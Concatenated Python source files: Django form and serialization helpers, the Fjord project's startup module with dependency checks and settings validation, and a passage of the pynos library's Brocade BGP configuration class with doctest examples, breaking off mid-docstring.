v = dateparse.parse_datetime(v)
elif isinstance(f, TimeField):
v = dateparse.parse_time(v)
elif isinstance(f, DateField):
v = dateparse.parse_date(v)
except FieldDoesNotExist:
pass
setattr(ret, k, v)
return ret
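# Illustrative round-trip sketch (hypothetical model instance): datetimes
# survive the JSON hop because serialize_instance encodes them with
# DjangoJSONEncoder and deserialize_instance re-parses the ISO strings, e.g.:
#     data = serialize_instance(user)           # JSON-safe dict, no '_' keys
#     clone = deserialize_instance(User, data)  # unsaved model instance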
def set_form_field_order(form, fields_order):
if isinstance(form.fields, SortedDict):
form.fields.keyOrder = fields_order
else:
# Python 2.7+
from collections import OrderedDict
assert isinstance(form.fields, OrderedDict)
form.fields = OrderedDict((f, form.fields[f])
for f in fields_order)
def build_absolute_uri(request, location, protocol=None):
uri = request.build_absolute_uri(location)
if protocol:
uri = protocol + ':' + uri.partition(':')[2]
return uri
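# Illustrative sketch (hypothetical URI, no request object needed): the
# protocol override is plain string surgery on the rendered absolute URI.
def _example_protocol_override():
    uri = 'http://example.com/accounts/login/'
    assert 'https' + ':' + uri.partition(':')[2] == 'https://example.com/accounts/login/'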
def get_form_class(forms, form_id, default_form):
form_class = forms.get(form_id, default_form)
if isinstance(form_class, six.string_types):
form_class = import_attribute(form_class)
return form_class
|
|
"""This module holds all the functions that deal with starting up
Fjord for both the developer and server environments.
These functions shouldn't be used after startup is completed.
"""
import logging
import os
import sys
from itertools import chain
from fjord import path
log = logging.getLogger(__name__)
# Denotes that setup_environ has been run.
_has_setup_environ = False
# Prevent from patching twice.
_has_patched = False
# Taken from peep
class EmptyOptions(object):
"""Fake optparse options for compatibility with pip<1.2
    pip<1.2 had a bug in parse_requirements() in which the ``options``
kwarg was required. We work around that by passing it a mock
object.
"""
default_vcs = None
skip_requirements_regex = None
isolated_mode = False
def check_dependencies():
"""Check installed requirements vs. specified requirements
This prints out a list of dependencies where the version installed
is not the same as the one specified in the requirements files.
It also exits immediately. At some point we might want to change
it from doing that, but not today.
If you want to skip this check, set SKIP_CHECK=1 in your
environment.
.. Note::
This only works for packaged requirements. It does not work for
requirements downloaded in a tarball from github. Those
requirements get put in the "unsatisfyable" requirements list
and this will tell you how many there are.
Generally we should minimize those requirements as much as
possible.
"""
# Import this here because not all environments have pip.
from pip.req import parse_requirements
from pip.download import PipSession
req_path = path('requirements')
req_files = [os.path.join(req_path, fn) for fn in os.listdir(req_path)]
reqs = list(chain(*(parse_requirements(path,
options=EmptyOptions(),
session=PipSession())
for path in req_files)))
unsatisfied_reqs = []
unsatisfyable_reqs = []
for req in reqs:
if req.link and req.url and 'github.com' in req.url:
unsatisfyable_reqs.append(req)
continue
req.check_if_exists()
if not req.satisfied_by:
unsatisfied_reqs.append(req)
    if unsatisfyable_reqs:
        print('There are %d requirements that cannot be checked.' %
              len(unsatisfyable_reqs))
    if unsatisfied_reqs:
        print('The following requirements are not satisfied:')
        print('')
        for req in unsatisfied_reqs:
            print('UNSATISFIED: %s' % req.req)
        print('')
        print('Update your virtual environment by doing:')
        print('')
        print('    ./peep.sh install -r requirements/requirements.txt')
        print('    ./peep.sh install -r requirements/compiled.txt')
        print('    ./peep.sh install -r requirements/dev.txt')
        print('')
        print('or run with SKIP_CHECK=1 .')
        sys.exit(1)
def setup_environ():
"""Sets up the Django environment
1. validates settings
2. sets up django-celery
"""
global _has_setup_environ
if _has_setup_environ:
return
from django.conf import settings
validate_settings(settings)
_has_setup_environ = True
def validate_settings(settings):
"""Raise an error if we see insecure or missing settings"""
from django.core.exceptions import ImproperlyConfigured
if not settings.DATABASES['default']:
msg = 'DATABASES["default"] needs to be set.'
raise ImproperlyConfigured(msg)
if not getattr(settings, 'SECRET_KEY', None):
msg = 'settings.SECRET_KEY needs to be set.'
raise ImproperlyConfigured(msg)
if not settings.DEBUG:
        if settings.SECRET_KEY == 'notsecret':
msg = 'settings.SECRET_KEY is set to "notsecret". please change.'
raise ImproperlyConfigured(msg)
if getattr(settings, 'SESSION_COOKIE_SECURE', None) is None:
msg = (
'settings.SESSION_COOKIE_SECURE should be set to True; '
'otherwise, your session ids can be intercepted over HTTP!'
)
raise ImproperlyConfigured(msg)
        hmac = getattr(settings, 'HMAC_KEYS', {})
        if not hmac:
msg = 'settings.HMAC_KEYS cannot be empty.'
raise ImproperlyConfigured(msg)
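# Illustrative sketch (hypothetical settings stub, not part of the original
# module): validate_settings only uses attribute access, so a plain class is
# enough to exercise it in isolation.
def _example_validate_settings():
    class FakeSettings(object):
        DEBUG = False
        DATABASES = {'default': {'ENGINE': 'django.db.backends.sqlite3'}}
        SECRET_KEY = 's3kr1t'
        SESSION_COOKIE_SECURE = True
        HMAC_KEYS = {'2015-01-01': 'some-long-random-value'}
    validate_settings(FakeSettings)  # raises ImproperlyConfigured on bad values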
def monkeypatch():
"""All the monkeypatching we have to do to get things running"""
global _has_patched
if _has_patched:
return
# Import for side-effect: configures logging handlers.
from fjord.settings.log_settings import noop
noop()
# Monkey-patch admin site.
from django.contrib import admin
from django.contrib.auth.decorators import login_required
from session_csrf import anonymous_csrf
from adminplus.sites import AdminSitePlus
# Patch the admin
admin.site = AdminSitePlus()
admin.site.login = login_required(anonymous_csrf(admin.site.login))
# Monkey-patch django forms to avoid having to use Jinja2's |safe
# everywhere.
import jingo.monkey
jingo.monkey.patch()
# Monkey-patch Django's csrf_protect decorator to use
# session-based CSRF tokens.
import session_csrf
session_csrf.monkeypatch()
from jingo import load_helpers
load_helpers()
logging.debug('Note: monkeypatches executed in %s' % __file__)
# Prevent it from being run again later.
_has_patched = True
def main(argv=None):
if not _has_setup_environ:
raise EnvironmentError(
'setup_environ() has not been called for this process')
from django.core.management import execute_from_command_line
argv = argv or sys.argv
execute_from_command_line(argv)
|
|
"""
Copyright 2015 Brocade Communications Systems, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from ipaddress import ip_interface
import xml.etree.ElementTree as ET
from pynos.versions.ver_6.ver_6_0_1.yang.brocade_rbridge import brocade_rbridge
import pynos.utilities
from pynos.versions.base.bgp import BGP as BaseBGP
class BGP(BaseBGP):
"""
    The BGP class holds all relevant methods and attributes for the BGP
capabilities of the NOS device.
Attributes:
None
"""
def __init__(self, callback):
"""
BGP object init.
Args:
callback: Callback function that will be called for each action.
Returns:
BGP Object
Raises:
None
"""
super(BGP, self).__init__(callback)
self._rbridge = brocade_rbridge(callback=pynos.utilities.return_xml)
def local_asn(self, **kwargs):
"""Set BGP local ASN.
Args:
            local_as (str): Local ASN of NOS device.
rbridge_id (str): The rbridge ID of the device on which BGP will be
configured in a VCS fabric.
get (bool): Get config instead of editing config. (True, False)
callback (function): A function executed upon completion of the
method. The only parameter passed to `callback` will be the
``ElementTree`` `config`.
Returns:
Return value of `callback`.
Raises:
KeyError: if `local_as` is not specified.
Examples:
>>> import pynos.device
>>> conn = ('10.24.39.203', '22')
>>> auth = ('admin', 'password')
>>> with pynos.device.Device(conn=conn, auth=auth) as dev:
... output = dev.bgp.local_asn(local_as='65535',
... rbridge_id='225')
... dev.bgp.local_asn() # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
KeyError
"""
is_get_config = kwargs.pop('get', False)
if not is_get_config:
local_as = kwargs.pop('local_as')
else:
local_as = ''
rbridge_id = kwargs.pop('rbridge_id', '1')
callback = kwargs.pop('callback', self._callback)
local_as_args = dict(local_as=local_as,
rbridge_id=rbridge_id)
enable_bgp = getattr(self._rbridge,
'rbridge_id_router_router_bgp_router_bgp_'
'attributes_local_as')(**local_as_args)
bgp = enable_bgp.find('.//*.//*.//*')
bgp.remove(bgp.find('.//*'))
if not is_get_config:
callback(enable_bgp)
local_as = getattr(self._rbridge,
'rbridge_id_router_router_bgp_router_bgp_attri'
'butes_local_as')
config = local_as(**local_as_args)
if is_get_config:
return callback(config, handler='get_config')
return callback(config)
def as4_capability(self, **kwargs):
"""Set Spanning Tree state.
Args:
enabled (bool): Is AS4 Capability enabled? (True, False)
callback (function): A function executed upon completion of the
method. The only parameter passed to `callback` will be the
``ElementTree`` `config`.
Returns:
Return value of `callback`.
Raises:
            ValueError: if `enabled` is invalid.
Examples:
>>> import pynos.device
>>> switches = ['10.24.39.211', '10.24.39.203']
>>> auth = ('admin', 'password')
>>> for switch in switches:
... conn = (switch, '22')
... with pynos.device.Device(conn=conn, auth=auth) as dev:
... output = dev.bgp.local_asn(local_as='65535',
... rbridge_id='225')
... output = dev.bgp.as4_capability(
... rbridge_id='225', enabled=True)
... output = dev.bgp.as4_capability(
... rbridge_id='225', enabled=False)
"""
enabled = kwargs.pop('enabled', True)
callback = kwargs.pop('callback', self._callback)
if not isinstance(enabled, bool):
raise ValueError('%s must be `True` or `False`.' % repr(enabled))
as4_capability_args = dict(vrf_name=kwargs.pop('vrf', 'default'),
rbridge_id=kwargs.pop('rbridge_id', '1'))
as4_capability = getattr(self._rbridge,
'rbridge_id_router_router_bgp_router_bgp'
'_attributes_capability_as4_enable')
config = as4_capability(**as4_capability_args)
if not enabled:
capability = config.find('.//*capability')
capability.set('operation', 'delete')
# shutdown = capability.find('.//*as4-enable')
# shutdown.set('operation', 'delete')
return callback(config)
def remove_bgp(self, **kwargs):
"""Remove BGP process completely.
Args:
vrf (str): The VRF for this BGP process.
rbridge_id (str): The rbridge ID of the device on which BGP will be
configured in a VCS fabric.
callback (function): A function executed upon completion of the
method. The only parameter passed to `callback` will be the
``ElementTree`` `config`.
Returns:
Return value of `callback`.
Raises:
None
Examples:
>>> import pynos.device
>>> conn = ('10.24.39.203', '22')
>>> auth = ('admin', 'password')
>>> with pynos.device.Device(conn=conn, auth=auth) as dev:
... output = dev.bgp.local_asn(local_as='65535',
... rbridge_id='225')
... output = dev.bgp.remove_bgp(rbridge_id='225')
"""
rbridge_id = kwargs.pop('rbridge_id', '1')
callback = kwargs.pop('callback', self._callback)
disable_args = dict(rbridge_id=rbridge_id, local_as='65000')
config = getattr(self._rbridge,
'rbridge_id_router_router_bgp_router_bgp_'
'attributes_local_as')(**disable_args)
bgp = config.find('.//*.//*.//*')
bgp.remove(bgp.find('.//*'))
bgp.set('operation', 'delete')
return callback(config)
def neighbor(self, **kwargs):
"""Add BGP neighbor.
Args:
ip_addr (str): IP Address of BGP neighbor.
remote_as (str): Remote ASN of BGP neighbor.
rbridge_id (str): The rbridge ID of the device on which BGP will be
configured in a VCS fabric.
delete (bool): Deletes the neighbor if `delete` is ``True``.
get (bool): Get config instead of editing config. (True, False)
callback (function): A function executed upon completion of the
method. The only parameter passed to `callback` will be the
``ElementTree`` `config`.
        Returns:
Return value of `callback`.
Raises:
KeyError: if `remote_as` or `ip_addr` is not specified.
Examples:
>>> import pynos.device
>>> conn = ('10.24.39.203', '22')
>>> auth = ('admin', 'password')
>>> with pynos.device.Device(conn=conn, auth=auth) as dev:
... output = dev.bgp.local_asn(local_as='65535',
... rbridge_id='225')
... output = dev.bgp.neighbor(ip_addr='10.10.10.10',
... remote_as='65535', rbridge_id='225')
... output = dev.bgp.neighbor(remote_as='65535',
... rbridge_id='225',
... ip_addr='2001:4818:f000:1ab:cafe:beef:1000:1')
... output = dev.bgp.neighbor(ip_addr='10.10.10.10',
... delete=True, rbridge_id='225')
... output = dev.bgp.neighbor(remote_as='65535',
... rbridge_id='225',
... ip_addr='2001:4818:f000:1ab:cafe:beef:1000:1',
... delete=True)
... dev.bgp.neighbor() # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
KeyError
"""
ip_addr = kwargs.pop('ip_addr')
remote_as = kwargs.pop('remote_as', None)
rbridge_id = kwargs.pop('rbridge_id', '1')
delete = kwargs.pop('delete', False)
callback = kwargs.pop('callback', self._callback)
ip_addr = ip_interface(unicode(ip_addr))
if not delete and remote_as is None:
raise ValueError('When configuring a neighbor, you must specify '
'its remote-as.')
neighbor_args = dict(router_bgp_neighbor_address=str(ip_addr.ip),
remote_as=remote_as,
rbridge_id=rbridge_id)
if ip_addr.version == 6:
neighbor_args['router_bgp_neighbor_ipv6_address'] = str(ip_addr.ip)
if ip_addr.version == 4:
neighbor = getattr(self._rbridge,
'rbridge_id_router_router_bgp_'
'router_bgp_attributes_neighbor_neighbor_ips_'
'neighbor_addr_remote_as')
ip_addr_path = './/*remote-as'
else:
neighbor = getattr(self._rbridge,
'rbridge_id_router_router_bgp_'
'router_bgp_attributes_neighbor_'
'neighbor_ipv6s_neighbor_ipv6_addr_remote_as')
ip_addr_path = './/*remote-as'
config = neighbor(**neighbor_args)
if delete and config.find(ip_addr_path) is not None:
if ip_addr.version == 4:
config.find(ip_addr_path).set('operation', 'delete')
config.find('.//*router-bgp-neighbor-address').set('operation',
'delete')
elif ip_addr.version == 6:
config.find(ip_addr_path).set('operation', 'delete')
config.find('.//*router-bgp-neighbor-ipv6-address').set(
'operation', 'delete')
else:
if ip_addr.version == 6:
callback(config)
activate_args = dict(rbridge_id=rbridge_id,
af_ipv6_neighbor_address=str(ip_addr.ip))
activate_neighbor = getattr(self._rbridge,
'rbridge_id_router_router_bgp_'
'address_family_ipv6_ipv6_unicast_'
'default_vrf_neighbor_af_ipv6_'
'neighbor_address_holder_af_ipv6_'
'neighbor_address_activate')
config = activate_neighbor(**activate_args)
if kwargs.pop('get', False):
return callback(config, handler='get_config')
return callback(config)
def neighbor_password(self, **kwargs):
"""Add BGP neighbor.
Args:
ip_addr (str): IP Address of BGP neighbor.
remote_as (str): Remote ASN of BGP neighbor.
rbridge_id (str): The rbridge ID of the device on which BGP will be
configured in a VCS fabric.
password (str): Password to be used between the peers for MD5
authentication
delete (bool): Deletes the neighbor if `delete` is ``True``.
get (bool): Get config instead of editing config. (True, False)
callback (function): A function executed upon completion of the
method. The only parameter passed to `callback` will be the
``ElementTree`` `config`.
        Returns:
Return value of `callback`.
Raises:
KeyError: if `remote_as` or `ip_addr` is not specified.
Examples:
>>> import pynos.device
>>> conn = ('10.24.39.203', '22')
>>> auth = ('admin', 'password')
>>> with pynos.device.Device(conn=conn, auth=auth) as dev:
... output = dev.bgp.local_asn(local_as='65535',
... rbridge_id='225')
... output = dev.bgp.neighbor(ip_addr='10.10.10.10',
... remote_as='65535', rbridge_id='225')
... output = dev.bgp.neighbor_password(ip_addr='10.10.10.10',
... remote_as='65535', rbridge_id='225', password='test')
... output = dev.bgp.neighbor_password(ip_addr='10.10.10.10',
... remote_as='65535', rbridge_id='225', password='test',
... delete=True)
... output = dev.bgp.neighbor(remote_as='65535',
... rbridge_id='225',
... ip_addr='2001:4818:f000:1ab:cafe:beef:1000:1')
... output = dev.bgp.neighbor_password(remote_as='65535',
... rbridge_id='225',
... ip_addr='2001:4818:f000:1ab:cafe:beef:1000:1',
... password='test')
... output = dev.bgp.neighbor_password(remote_as='65535',
... rbridge_id='225',
... ip_addr='2001:4818:f000:1ab:cafe:beef:1000:1',
... delete=True)
... output = dev.bgp.neighbor(ip_addr='10.10.10.10',
... delete=True, rbridge_id='225')
... output = dev.bgp.neighbor(remote_as='65535',
... rbridge_id='225',
... ip_addr='2001:4818:f000:1ab:cafe:beef:1000:1',
... delete=True)
... dev.bgp.neighbor() # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
KeyError
"""
ip_addr = kwargs.pop('ip_addr')
remote_as = kwargs.pop('remote_as', None)
rbridge_id = kwargs.pop('rbridge_id', '1')
delete = kwargs.pop('delete', False)
password = kwargs.pop('password', '')
callback = kwargs.pop('callback', self._callback)
ip_addr = ip_interface(unicode(ip_addr))
get_config = kwargs.pop('get', False)
if password == '' and not delete and not get_config:
raise ValueError('When configuring a neighbor password, you must '
'specify a non empty password')
if not delete and remote_as is None:
raise ValueError('When configuring a neighbor, you must specify '
'its remote-as.')
neighbor_args = dict(router_bgp_neighbor_address=str(ip_addr.ip),
remote_as=remote_as,
rbridge_id=rbridge_id,
password=password)
if ip_addr.version == 4:
neighbor = getattr(self._rbridge,
'rbridge_id_router_router_bgp_'
'router_bgp_attributes_neighbor_neighbor_ips_'
'neighbor_addr_password')
ip_addr_path = './/*password'
else:
neighbor_args['router_bgp_neighbor_ipv6_address'] = str(ip_addr.ip)
neighbor = getattr(self._rbridge,
'rbridge_id_router_router_bgp_'
'router_bgp_attributes_neighbor_'
'neighbor_ipv6s_neighbor_ipv6_addr_password')
ip_addr_path = './/*password'
config = neighbor(**neighbor_args)
if delete:
if ip_addr.version == 4:
config.find('.//*router-bgp-neighbor-address').set('operation',
'delete')
config.find(ip_addr_path).set('operation', 'delete')
elif ip_addr.version == 6:
config.find('.//*router-bgp-neighbor-ipv6-address').set(
'operation', 'delete')
config.find(ip_addr_path).set('operation', 'delete')
if get_config:
return callback(config, handler='get_config')
return callback(config)
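    # Illustrative sketch (standalone, not pynos API): the delete branch above
    # marks elements with NETCONF's ``operation="delete"`` attribute. The same
    # marking on a bare ElementTree document looks like:
    #
    #     import xml.etree.ElementTree as ET
    #     cfg = ET.fromstring('<config><password>foo</password></config>')
    #     cfg.find('.//password').set('operation', 'delete')
    #     ET.tostring(cfg)
    #     # b'<config><password operation="delete">foo</password></config>'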
def get_bgp_neighbors(self, **kwargs):
"""Get BGP neighbors configured on a device.
Args:
rbridge_id (str): The rbridge ID of the device on which BGP will be
configured in a VCS fabric.
vrf (str): The VRF for this BGP process.
callback (function): A function executed upon completion of the
method. The only parameter passed to `callback` will be the
``ElementTree`` `config`.
Returns:
List of 0 or more BGP Neighbors on the specified rbridge.
Examples:
>>> import pynos.device
>>> conn = ('10.24.39.211', '22')
>>> auth = ('admin', 'password')
>>> with pynos.device.Device(conn=conn, auth=auth) as dev:
... output = dev.bgp.local_asn(local_as='65535',
... rbridge_id='225')
... output = dev.bgp.neighbor(ip_addr='10.10.10.10',
... remote_as='65535', rbridge_id='225')
... output = dev.bgp.neighbor(remote_as='65535',
... rbridge_id='225',
... ip_addr='2001:4818:f000:1ab:cafe:beef:1000:1')
... result = dev.bgp.get_bgp_neighbors(rbridge_id='225')
... assert len(result) >= 1
... output = dev.bgp.neighbor(ip_addr='10.10.10.10',
... delete=True, rbridge_id='225')
... output = dev.bgp.neighbor(delete=True, rbridge_id='225',
... ip_addr='2001:4818:f000:1ab:cafe:beef:1000:1')
... dev.bgp.neighbor() # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
            KeyError
"""
callback = kwargs.pop('callback', self._callback)
neighbor_args = dict(router_bgp_neighbor_address='',
remote_as='',
vrf_name=kwargs.pop('vrf', 'default'),
rbridge_id=kwargs.pop('rbridge_id', '1'))
neighbor = getattr(self._rbridge,
'rbridge_id_router_router_bgp_'
'router_bgp_attributes_neighbor_neighbor_ips_'
'neighbor_addr_remote_as')
config = neighbor(**neighbor_args)
output = callback(config, handler='get_config')
result = []
urn = "{urn:brocade.com:mgmt:brocade-bgp}"
# IPv4 BGP Neighbor Handling
for item in output.data.findall('.//{*}neighbor-addr'):
neighbor_address = item.find(
'%srouter-bgp-neighbor-address' % urn).text
remote_as = item.find('%sremote-as' % urn).text
item_results = {'neighbor-address': neighbor_address,
'remote-as': remote_as}
result.append(item_results)
# IPv6 BGP Neighbor handling
neighbor_args['router_bgp_neighbor_ipv6_address'] = ''
neighbor = getattr(self._rbridge,
'rbridge_id_router_router_bgp_'
'router_bgp_attributes_neighbor_'
'neighbor_ipv6s_neighbor_ipv6_addr_remote_as')
config = neighbor(**neighbor_args)
output = callback(config, handler='get_config')
for item in output.data.findall('.//{*}neighbor-ipv6-addr'):
neighbor_address = item.find(
'%srouter-bgp-neighbor-ipv6-address' % urn).text
remote_as = item.find('%sremote-as' % urn).text
item_results = {'neighbor-address': neighbor_address,
'remote-as': remote_as}
result.append(item_results)
return result
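    # Parsing sketch (the reply XML below is assumed for illustration only):
    # the same namespaced lookups work on any ElementTree document, since the
    # default xmlns applies to every child element:
    #
    #     import xml.etree.ElementTree as ET
    #     urn = '{urn:brocade.com:mgmt:brocade-bgp}'
    #     data = ET.fromstring(
    #         '<data xmlns="urn:brocade.com:mgmt:brocade-bgp"><neighbor-addr>'
    #         '<router-bgp-neighbor-address>10.10.10.10'
    #         '</router-bgp-neighbor-address><remote-as>65535</remote-as>'
    #         '</neighbor-addr></data>')
    #     for item in data.findall('.//%sneighbor-addr' % urn):
    #         print(item.find('%sremote-as' % urn).text)  # prints: 65535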
def redistribute(self, **kwargs):
"""Set BGP redistribute properties.
Args:
vrf (str): The VRF for this BGP process.
rbridge_id (str): The rbridge ID of the device on which BGP will be
configured in a VCS fabric.
source (str): Source for redistributing. (connected)
afi (str): Address family to configure. (ipv4, ipv6)
get (bool): Get config instead of editing config. (True, False)
callback (function): A function executed upon completion of the
method. The only parameter passed to `callback` will be the
``ElementTree`` `config`.
Returns:
Return value of `callback`.
Raises:
KeyError: if `source` is not specified.
Examples:
>>> import pynos.device
>>> conn = ('10.24.39.203', '22')
>>> auth = ('admin', 'password')
>>> with pynos.device.Device(conn=conn, auth=auth) as dev:
... output = dev.bgp.redistribute(source='connected',
... rbridge_id='225')
... output = dev.bgp.redistribute(source='connected',
... rbridge_id='225', get=True)
... output = dev.bgp.redistribute(source='connected',
... rbridge_id='225', delete=True)
... dev.bgp.redistribute() # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
KeyError
... dev.bgp.redistribute(source='connected', rbridge_id='225',
... afi='hodor') # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
AttributeError
... dev.bgp.redistribute(source='hodor', rbridge_id='225',
... afi='ipv4') # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
AttributeError
"""
# This method is the same as the base method except for one place.
# The class doesn't inherit from the base class, though, so we have
# to duplicate.
source = kwargs.pop('source')
afi = kwargs.pop('afi', 'ipv4')
callback = kwargs.pop('callback', self._callback)
if afi not in ['ipv4', 'ipv6']:
raise AttributeError('Invalid AFI.')
args = dict(rbridge_id=kwargs.pop('rbridge_id', '1'),
afi=afi, source=source)
redistribute = self._redistribute_builder(afi=afi, source=source)
config = redistribute(**args)
if kwargs.pop('get', False):
return callback(config, handler='get_config')
if kwargs.pop('delete', False):
tag = 'redistribute-%s' % source
config.find('.//*%s' % tag).set('operation', 'delete')
return callback(config)
def _redistribute_builder(self, afi='ipv4', source=None):
"""Build BGP redistribute method.
Do not use this method directly. You probably want ``redistribute``.
Args:
source (str): Source for redistributing. (connected)
afi (str): Address family to configure. (ipv4, ipv6)
Returns:
Method to redistribute desired source.
Raises:
KeyError: if `source` is not specified.
Examples:
>>> import pynos.device
>>> conn = ('10.24.39.203', '22')
>>> auth = ('admin', 'password')
>>> with pynos.device.Device(conn=conn, auth=auth) as dev:
... output = dev.bgp._redistribute_builder(source='connected',
... afi='ipv4')
... dev.bgp._redistribute_builder(source='hodor',
... afi='ipv4') # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
AttributeError
"""
if source == 'connected':
return getattr(self._rbridge,
'rbridge_id_router_router_bgp_address_family_{0}_'
'{0}_unicast_default_vrf_af_{0}_uc_and_vrf_cmds_'
'call_point_holder_redistribute_connected_'
'redistribute_connected'.format(afi))
# TODO: Add support for 'static' and 'ospf'
else:
raise AttributeError('Invalid source.')
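    # For reference, the format string above expands (with afi='ipv4'), purely
    # by substitution, to the generated binding name:
    #
    #     rbridge_id_router_router_bgp_address_family_ipv4_ipv4_unicast_
    #     default_vrf_af_ipv4_uc_and_vrf_cmds_call_point_holder_
    #     redistribute_connected_redistribute_connected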
def max_paths(self, **kwargs):
"""Set BGP max paths property.
Args:
vrf (str): The VRF for this BGP process.
rbridge_id (str): The rbridge ID of the device on which BGP will be
configured in a VCS fabric.
paths (str): Number of paths for BGP ECMP (default: 8).
afi (str): Address family to configure. (ipv4, ipv6)
get (bool): Get config instead of editing config. (True, False)
callback (function): A function executed upon completion of the
method. The only parameter passed to `callback` will be the
``ElementTree`` `config`.
Returns:
Return value of `callback`.
Raises:
``AttributeError``: When `afi` is not one of ['ipv4', 'ipv6']
Examples:
>>> import pynos.device
>>> conn = ('10.24.39.203', '22')
>>> auth = ('admin', 'password')
>>> with pynos.device.Device(conn=conn, auth=auth) as dev:
... output = dev.bgp.max_paths(paths='8',
... rbridge_id='225')
... output = dev.bgp.max_paths(paths='8',
... rbridge_id='225', get=True)
... output = dev.bgp.max_paths(paths='8',
... rbridge_id='225', delete=True)
... output = dev.bgp.max_paths(paths='8', afi='ipv6',
... rbridge_id='225')
... output = dev.bgp.max_paths(paths='8', afi='ipv6',
... rbridge_id='225', get=True)
... output = dev.bgp.max_paths(paths='8', afi='ipv6',
... rbridge_id='225', delete=True)
... output = dev.bgp.max_paths(paths='8', afi='ipv5',
... rbridge_id='225') # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
AttributeError
"""
afi = kwargs.pop('afi', 'ipv4')
callback = kwargs.pop('callback', self._callback)
if afi not in ['ipv4', 'ipv6']:
raise AttributeError('Invalid AFI.')
args = dict(rbridge_id=kwargs.pop('rbridge_id', '1'),
load_sharing_value=kwargs.pop('paths', '8'))
max_paths = getattr(self._rbridge,
'rbridge_id_router_router_bgp_address_family_{0}_'
'{0}_unicast_default_vrf_af_common_cmds_holder_'
'maximum_paths_load_sharing_value'.format(afi))
config = max_paths(**args)
if kwargs.pop('get', False):
return callback(config, handler='get_config')
if kwargs.pop('delete', False):
tag = 'maximum-paths'
config.find('.//*%s' % tag).set('operation', 'delete')
return callback(config)
def recursion(self, **kwargs):
"""Set BGP next hop recursion property.
Args:
rbridge_id (str): The rbridge ID of the device on which BGP will be
                configured in a VCS fabric.
            vrf (str): The VRF for this BGP process.
            afi (str): Address family to configure. (ipv4, ipv6)
get (bool): Get config instead of editing config. (True, False)
callback (function): A function executed upon completion of the
method. The only parameter passed to `callback` will be the
``ElementTree`` `config`.
Returns:
Return value of `callback`.
Raises:
``AttributeError``: When `afi` is not one of ['ipv4', 'ipv6']
Examples:
>>> import pynos.device
>>> conn = ('10.24.39.203', '22')
>>> auth = ('admin', 'password')
>>> with pynos.device.Device(conn=conn, auth=auth) as dev:
... output = dev.bgp.recursion(rbridge_id='225')
... output = dev.bgp.recursion(rbridge_id='225', get=True)
... output = dev.bgp.recursion(rbridge_id='225', delete=True)
            ... output = dev.bgp.recursion(rbridge_id='225', afi='ipv6')
            ... output = dev.bgp.recursion(rbridge_id='225', afi='ipv6',
            ... get=True)
            ... output = dev.bgp.recursion(rbridge_id='225', afi='ipv6',
            ... delete=True)
            ... output = dev.bgp.recursion(rbridge_id='225', afi='ipv5')
... # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
AttributeError
"""
afi = kwargs.pop('afi', 'ipv4')
callback = kwargs.pop('callback', self._callback)
if afi not in ['ipv4', 'ipv6']:
raise AttributeError('Invalid AFI.')
args = dict(vrf_name=kwargs.pop('vrf', 'default'),
rbridge_id=kwargs.pop('rbridge_id', '1'))
recursion = getattr(self._rbridge,
'rbridge_id_router_router_bgp_address_family_{0}_'
'{0}_unicast_default_vrf_next_hop_'
'recursion'.format(afi))
config = recursion(**args)
if kwargs.pop('get', False):
return callback(config, handler='get_config')
if kwargs.pop('delete', False):
tag = 'next-hop-recursion'
config.find('.//*%s' % tag).set('operation', 'delete')
return callback(config)
def graceful_restart(self, **kwargs):
"""Set BGP next hop recursion property.
Args:
rbridge_id (str): The rbridge ID of the device on which BGP will be
configured in a VCS fabric.
afi (str): Address family to configure. (ipv4, ipv6)
get (bool): Get config instead of editing config. (True, False)
callback (function): A function executed upon completion of the
method. The only parameter passed to `callback` will be the
``ElementTree`` `config`.
Returns:
Return value of `callback`.
Raises:
``AttributeError``: When `afi` is not one of ['ipv4', 'ipv6']
Examples:
>>> import pynos.device
>>> conn = ('10.24.39.212', '22')
>>> auth = ('admin', 'password')
>>> with pynos.device.Device(conn=conn, auth=auth) as dev:
... output = dev.bgp.graceful_restart(rbridge_id='226')
... output = dev.bgp.graceful_restart(rbridge_id='226',
... get=True)
... output = dev.bgp.graceful_restart(rbridge_id='226',
... delete=True)
... output = dev.bgp.graceful_restart(rbridge_id='226',
... afi='ipv6')
... output = dev.bgp.graceful_restart(rbridge_id='226',
... afi='ipv6', get=True)
... output = dev.bgp.graceful_restart(rbridge_id='226',
... afi='ipv6', delete=True)
... output = dev.bgp.graceful_restart(rbridge_id='226',
... afi='ipv5') # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
AttributeError
"""
# TODO: Add support for timers
afi = kwargs.pop('afi', 'ipv4')
callback = kwargs.pop('callback', self._callback)
if afi not in ['ipv4', 'ipv6']:
raise AttributeError('Invalid AFI.')
args = dict(rbridge_id=kwargs.pop('rbridge_id', '1'))
graceful = getattr(self._rbridge,
'rbridge_id_router_router_bgp_address_family_{0}_'
'{0}_unicast_default_vrf_af_common_cmds_holder_'
'graceful_restart_graceful_restart_'
'status'.format(afi))
config = graceful(**args)
if kwargs.pop('get', False):
return callback(config, handler='get_config')
if kwargs.pop('delete', False):
tag = 'graceful-restart'
config.find('.//*%s' % tag).set('operation', 'delete')
return callback(config)
def _multihop_xml(self, **kwargs):
"""Build BGP multihop XML.
Do not use this method directly. You probably want ``multihop``.
Args:
rbridge_id (str): The rbridge ID of the device on which BGP will be
configured in a VCS fabric.
neighbor (ipaddress.ip_interface): `ip_interface` object containing
peer IP address (IPv4 or IPv6).
count (str): Number of hops to allow. (1-255)
Returns:
``ElementTree``: XML for configuring BGP multihop.
Raises:
KeyError: if any arg is not specified.
Examples:
>>> import pynos.device
